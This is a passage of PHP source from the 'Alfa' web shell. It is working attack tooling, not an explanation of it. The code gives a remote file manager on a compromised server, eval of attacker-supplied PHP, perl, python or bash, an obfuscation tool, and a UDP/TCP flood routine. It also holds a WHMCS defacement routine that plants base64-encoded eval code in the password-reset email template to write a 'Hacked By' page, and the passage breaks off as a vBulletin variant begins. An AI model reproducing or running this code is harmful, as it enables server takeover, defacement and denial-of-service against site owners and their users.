3957 $_POST['alfa2'] = 'image';
3958 }
3959 }
3960 }
3961 }
3962}
3963}
3964if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
3965if(@$_POST['alfa2'] == 'mkfile'){
3966$_POST['alfa1'] = trim($_POST['alfa1']);
3967if($chdir_fals&&$alfa_canruncmd){
3968 if(_alfa_is_writable($_POST["c"])){
3969 alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
3970 $_POST['alfa2'] = "edit";
3971 }
3972}
3973if(!@file_exists($_POST['alfa1'])){
3974$fp = @fopen($_POST['alfa1'], 'w');
3975if($fp){
3976$_POST['alfa2'] = "edit";
3977fclose($fp);
3978}
3979}else{
3980$_POST['alfa2'] = "edit";
3981}
3982}
3983if(!_alfa_file_exists(@$_POST['alfa1'])){
3984echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
3985alfaFooter();
3986return;
3987}
3988if($chdir_fals){
3989$filesize = $file_info[3];
3990$uid["name"] = $file_info[1];
3991$gid["name"] = $file_info[2];
3992$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
3993}else{
3994$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
3995$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
3996if(!$uid&&!$gid){
3997$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
3998$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
3999}
4000$permcolor = alfaPermsColor($_POST['alfa1']);
4001$filesize = @filesize($_POST['alfa1']);
4002if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
4003 if(_alfa_can_runCommand()){
4004 list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
4005 }
4006}
4007}
4008if(substr($_POST['alfa1'], 0, 7) == "phar://"){
4009 $alfa_file_directory = $_POST['alfa1'];
4010}else{
4011 $alfa_file_directory = str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']);
4012}
4013echo '<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;"><span class="editor_file_info_vars">Name:</span> '.htmlspecialchars(basename($alfa1_decoded)).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.dirname($alfa_file_directory).'</div>';
4014if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
4015if(!_alfa_is_dir($_POST['alfa1'])){
4016$m = array('View', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
4017$ftype = "file";
4018}else{
4019$m = array('Chmod', 'Rename', 'Touch');
4020$ftype = "dir";
4021}
4022echo('<div>');
4023foreach($m as $v)
4024echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
4025echo '</div>';
4026switch($_POST['alfa2']){
4027case 'view':case 'edit':
4028@chdir($_POST['c']);
4029$disabled_btn = "";
4030if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
4031$disabled_btn = "disabled=disabled";
4032$disabled_btn_style= 'background: #ff0000;color: #fff;';
4033}
4034if(!empty($_POST['alfa3'])){
4035$_POST['alfa3'] = substr($_POST['alfa3'],1);
4036$time = @filemtime($_POST['alfa1']);
4037$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
4038if($chdir_fals&&$alfa_canruncmd){
4039 $rname = $alfa1_decoded;
4040 $randname = $rname.rand(111,9999);
4041 $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
4042 if($fp = @__write_file($filepath ,$_POST['alfa3'])){
4043 alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
4044 }
4045}
4046if($fp){
4047echo 'Saved!<br>';
4048@touch($_POST['alfa1'],$time,$time);
4049}
4050}
4051echo '<div class="editor-view"><div class="view-content editor-ace-controller"><div style="display:inline-block;">'._alfa_load_ace_options("editor").'<button style="border-radius:10px;" class="button ace-controler" onClick="copyToClipboard(this);">Copy</button> <button class="button ace-controler" onclick="alfaAceToFullscreen(this);">Full Screen</button> <button onclick="var ace_val = alfa_ace_editors.editor[this.getAttribute(\'ace_id\')].getValue();editor(\''.addslashes($alfa1_decoded).'\',\'edit\',\'1\'+ace_val,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;" class="button ace-controler" style="width: 100px;height: 33px;'.$disabled_btn_style.'" '.$disabled_btn.'>save</button></div><pre class="ml1 view_ml_content">';
4052echo htmlspecialchars(__read_file($_POST['alfa1']));
4053echo '</pre></div></div>';
4054break;
4055case 'highlight':
4056@chdir($_POST['c']);
4057if(@is_readable($_POST['alfa1'])){
4058echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
4059$code = @highlight_file($_POST['alfa1'],true);
4060echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
4061}
4062break;
4063case 'delete':
4064@chdir($_POST['c']);
4065if(@is_writable($_POST['alfa1'])||$GLOBALS["glob_chdir_false"]){
4066$deleted = true;
4067if(!@unlink($_POST['alfa1'])){
4068 $deleted = false;
4069 if($alfa_canruncmd){
4070 if(_alfa_is_writable($_POST['alfa1'])){
4071 alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
4072 $deleted = true;
4073 }
4074 }
4075}
4076if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
4077break;
4078case 'chmod':
4079@chdir($_POST['c']);
4080if(!empty($_POST['alfa3'])){
4081$perms = 0;
4082for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
4083$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
4084if(!@chmod($_POST['alfa1'], $perms)){
4085if($chdir_fals&&$alfa_canruncmd){
4086alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
4087echo('Success!');
4088}else{
4089echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
4090}else{echo('Success!');}
4091}
4092clearstatcache();
4093AlfaNum(8,9,10,7,6,5,4,2,1);
4094if($chdir_fals){
4095 $file_perm = $file_info[5];
4096}else{
4097 $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
4098}
4099echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
4100break;
4101case 'hexdump':
4102@chdir($_POST['c']);
4103$c = __read_file($_POST['alfa1']);
4104$n = 0;
4105$h = array('00000000<br>','','');
4106$len = strlen($c);
4107for ($i=0; $i<$len; ++$i) {
4108$h[1] .= sprintf('%02X',ord($c[$i])).' ';
4109switch ( ord($c[$i]) ) {
4110case 0: $h[2] .= ' '; break;
4111case 9: $h[2] .= ' '; break;
4112case 10: $h[2] .= ' '; break;
4113case 13: $h[2] .= ' '; break;
4114default: $h[2] .= $c[$i]; break;
4115}
4116$n++;
4117if ($n == 32) {
4118$n = 0;
4119if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
4120$h[1] .= '<br>';
4121$h[2] .= "\n";
4122}
4123}
4124echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
4125break;
4126case 'rename':
4127@chdir($_POST['c']);
4128$alfa1_escape = addslashes($_POST["alfa1"]);
4129$alfa3_escape = addslashes($_POST["alfa3"]);
4130if(!empty($_POST['alfa3'])){
4131$cmd_rename = false;
4132if($chdir_fals&&$alfa_canruncmd){
4133if(_alfa_is_writable($_POST['alfa1'])){
4134$alfa1_escape = addslashes($alfa1_decoded);
4135alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
4136}else{
4137$cmd_rename = true;
4138}
4139}else{
4140$alfa1_escape = addslashes($_POST["alfa1"]);
4141}
4142if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
4143echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";updateFileEditor("'.$alfa1_escape.'", "'.$alfa3_escape.'");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
4144}
4145echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
4146break;
4147case 'touch':
4148@chdir($_POST['c']);
4149if( !empty($_POST['alfa3']) ) {
4150$time = strtotime($_POST['alfa3']);
4151if($time){
4152$touched = false;
4153if($chdir_fals&&$alfa_canruncmd){
4154 alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
4155 $touched = true;
4156}
4157if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
4158echo 'Fail!';
4159else
4160echo 'Touched!';
4161} else echo 'Bad time format!';
4162}
4163clearstatcache();
4164echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
4165break;
4166case 'image':
4167@chdir($_POST['c']);
4168echo('<hr>');
4169$file = $_POST['alfa1'];
4170$image_info = @getimagesize($file);
4171if(is_array($image_info)||$chdir_fals){
4172$width = (int)$image_info[0];
4173$height = (int)$image_info[1];
4174if($chdir_fals&&$alfa_canruncmd){
4175 $source = alfaEx("cat '".addslashes($file)."' | base64");
4176 list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
4177 $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
4178 $image_info['mime'] = $mime[1];
4179}else{
4180 $source = __ZW5jb2Rlcg(__read_file($file, false));
4181}
4182$image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
4183if($width > 800){$width = 800;}
4184echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
4185}
4186break;
4187}
4188echo '</div>';
4189alfaFooter();
4190}
4191function findicon($file,$type){
4192$s = 'http://solevisible.com/icons/';
4193$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
4194if($type!='file'){
4195return ($file=='..'?$s.'back.png':$s.'folder.png');
4196}else{
4197$ext = explode('.',$file);
4198$ext = end($ext);
4199$ext = strtolower($ext);
4200return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
4201}
4202}
4203function alfadlfile(){
4204if(isset($_POST['c'],$_POST['file'])){
4205$basename = rawurldecode(basename($_POST['file']));
4206$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
4207$alfa_canruncmd = _alfa_can_runCommand(true,true);
4208if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
4209ob_start("ob_gzhandler", 4096);
4210header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
4211header("Content-Type: application/octet-stream");
4212if($GLOBALS["glob_chdir_false"]){
4213 $randname = $basename.rand(111,9999);
4214 $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
4215 $filepath = $scriptpath."/".$randname;
4216 if(_alfa_is_writable($scriptpath)){
4217 alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
4218 readfile($filepath);
4219 @unlink($filepath);
4220 }else{
4221 alfaEx("cat '".addslashes($_POST["file"])."'");
4222 }
4223}else{
4224 readfile($_POST['file']);
4225}
4226}else echo('Error...!');}}
4227function __alfa_set_cookie($key, $value){
4228 $_COOKIE[$key] = $value;
4229 @setcookie($key, $value, time()+(86400 * 7), '/');
4230}
4231function alfaphpeval(){
4232if(isset($_COOKIE["eval_tmpdir"])&&@is_dir($_COOKIE["eval_tmpdir"])){
4233 $tempdir = $_COOKIE["eval_tmpdir"];
4234}else{
4235 $tempdir = dirname(alfaEx("mktemp"));
4236 __alfa_set_cookie("eval_tmpdir", $tempdir);
4237}
4238alfahead();
4239if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
4240echo '<div class=header>';
4241ob_start();
4242$INI=ini_get_all();
4243print '<table border=0><tr>'
4244.'<td class="listing"><font class="highlight_txt">Param</td>'
4245.'<td class="listing"><font class="highlight_txt">Global value</td>'
4246.'<td class="listing"><font class="highlight_txt">Local Value</td>'
4247.'<td class="listing"><font class="highlight_txt">Access</td></tr>';
4248foreach ($INI as $param => $values)
4249print "\n".'<tr>'
4250.'<td class="listing"><b>'.$param.'</td>'
4251.'<td class="listing">'.$values['global_value'].' </td>'
4252.'<td class="listing">'.$values['local_value'].' </td>'
4253.'<td class="listing">'.$values['access'].' </td></tr>';
4254$tmp = ob_get_clean();
4255$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
4256$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
4257echo str_replace('<h1','<h2', $tmp) .'</div><br>';
4258}
4259if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
4260echo '<div class=header><style>.p {color:#000;}</style>';
4261ob_start();
4262phpinfo();
4263$tmp = ob_get_clean();
4264$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
4265$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
4266echo str_replace('<h1','<h2', $tmp) .'</div><br>';
4267}
4268if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
4269echo '<div class=header>';
4270ob_start();
4271$EXT=get_loaded_extensions();
4272echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
4273echo '</div><br>';
4274}
4275$lang_html = "";
4276foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
4277echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form class="php-evals" name="pf" method="post" onsubmit="var ace_value=geEvalAceValue(this);g(\'phpeval\',null,ace_value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select>'._alfa_load_ace_options("eval").'<br><br><div class="bigarea" style="position:relative;"><div class="php-evals-ace">'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):"<?php\n\n\techo('hello alfa !');\n\n?>").'</div></div><center><input type="submit" value="" style="margin-top:5px"></center>';
4278echo '</form><pre id="PhpOutput" style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class="ml1">';
4279if(!empty($_POST['alfa1'])){
4280if($_POST['alfa3']=="php"){
4281ob_start();
4282eval('?>'.$_POST['alfa1']);
4283$result = htmlspecialchars(ob_get_clean());
4284}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
4285 $lang = $_POST['alfa3'];
4286 $filename = "temp".rand(11111,99999);
4287 $temp = $tempdir."/".$filename ;
4288 __write_file($filename, $_POST['alfa1']);
4289 $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
4290 @unlink($filename);
4291 @unlink($temp);
4292}
4293echo '<textarea class="bigarea">'.$result.'</textarea>';
4294}
4295echo '</pre></div>';
4296alfafooter();
4297}
4298function alfahash(){
4299if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
4300if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
4301$stringTools = array(
4302'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
4303'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
4304'strrev ( $string )' => 'strrev($s)',
4305'bin2hex ( $string )' => 'bin2hex($s)',
4306'hex2bin ( $string )' => 'hex2bin($s)',
4307'md5 ( $string )' => 'md5($s)',
4308'sha1 ( $string )' => 'sha1($s)',
4309'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
4310'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
4311'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
4312'crypt ( $string )' => 'crypt($s)',
4313'crc32 ( $string )' => 'crc32($s)',
4314'str_rot13 ( $string )' => 'str_rot13($s)',
4315'urlencode ( $string )' => 'urlencode($s)',
4316'urldecode ( $string )' => 'urldecode($s)',
4317'full_urlencode ( $string )' => 'full_urlencode($s)',
4318'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',
4319'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
4320'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
4321'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
4322'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
4323'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
4324'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
4325);
4326alfahead();
4327echo '<div class=header>';
4328echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
4329foreach($stringTools as $k => $v)
4330echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
4331echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
4332if(!empty($_POST['alfa1'])){
4333$string = addslashes($_POST['alfa2']);
4334$string = str_replace('\"','"',$string);
4335$alg = $_POST['alfa1'];
4336$code = str_replace('$s',"'".$string."'",$alg);
4337ob_start();
4338eval('echo '.$code.';');
4339$res = ob_get_contents();
4340ob_end_clean();
4341if(in_array($alg, $stringTools))echo '<textarea class="bigarea">'.htmlspecialchars($res).'</textarea>';
4342}
4343echo "</div>";
4344alfaFooter();
4345}
4346function alfados(){
4347alfahead();
4348echo '<div class=header>';
4349echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
4350if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
4351echo __pre();
4352$packets=0;
4353ignore_user_abort(true);
4354$exec_time=(int)$_POST['alfa2'];
4355$time=time();
4356$max_time=$exec_time+$time;
4357$host=$_POST['alfa1'];
4358$port=(int)$_POST['alfa3'];
4359$method=$_POST['alfa4'];
4360$out = str_repeat('X',65000);
4361while(1){
4362$packets++;
4363if(time() > $max_time){
4364break;
4365}
4366$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
4367if($fp){
4368fwrite($fp, $out);
4369fclose($fp);
4370}
4371}
4372echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
4373echo "</pre>";
4374}
4375echo '</div>';
4376alfafooter();
4377}
4378function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
4379function alfaIndexChanger(){
4380alfahead();
4381
4382echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
4383if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
4384echo __pre();
4385
4386echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
4387<p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
4388";
4389$table = array('td1' =>
4390 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
4391 'td2' =>
4392 array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
4393 'td3' =>
4394 array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
4395 'td4' =>
4396 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
4397 'td5' =>
4398 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
4399 'td6' =>
4400 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
4401);
4402create_table($table);
4403echo "<br><div class='txtfont'>| Your Index |</div><br>
4404<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
4405<input type='submit' value=' '>
4406</form></center></center>";
4407if(isset($_POST['alfa6'])){
4408$s0levisible="Powered By Solevisible";
4409$dbu = $_POST['alfa6'];
4410$path = $_POST['alfa5'];
4411$fname = $_POST['alfa4'];
4412$dbn = $_POST['alfa7'];
4413$dbp = $_POST['alfa8'];
4414$dbh = $_POST['alfa9'];
4415$index = $_POST['alfa10'];
4416$index = str_replace("\'","'",$index);
4417$deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
4418$saveData = __ZW5jb2Rlcg($deface);
4419$Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
4420if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
4421$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
4422$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
4423$soleGet = mysqli_fetch_assoc($soleSave);
4424$tempSave1 = $soleGet['message'];
4425$tempSave = str_replace("'","\'",$tempSave1);
4426$inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
4427$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
4428$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
4429$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
4430if(function_exists('curl_version')){
4431$AlfaSole = new AlfaCURL(true);
4432$saveurl = $AlfaSole->Send($path."/pwreset.php");
4433$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
4434$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
4435$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
4436$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
4437__alert('File Created...');
4438echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
4439}else{
4440echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
4441}}}}
4442if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
4443echo __pre();
4444
4445echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
4446<p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
4447";
4448$table = array('td1' =>
4449 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
4450 'td2' =>
4451 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
4452 'td3' =>
4453 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
4454 'td4' =>
4455 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
4456 'td5' =>
4457 array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
4458);
4459create_table($table);
4460echo "<br><div class='txtfont'>| Your Index |</div><br>
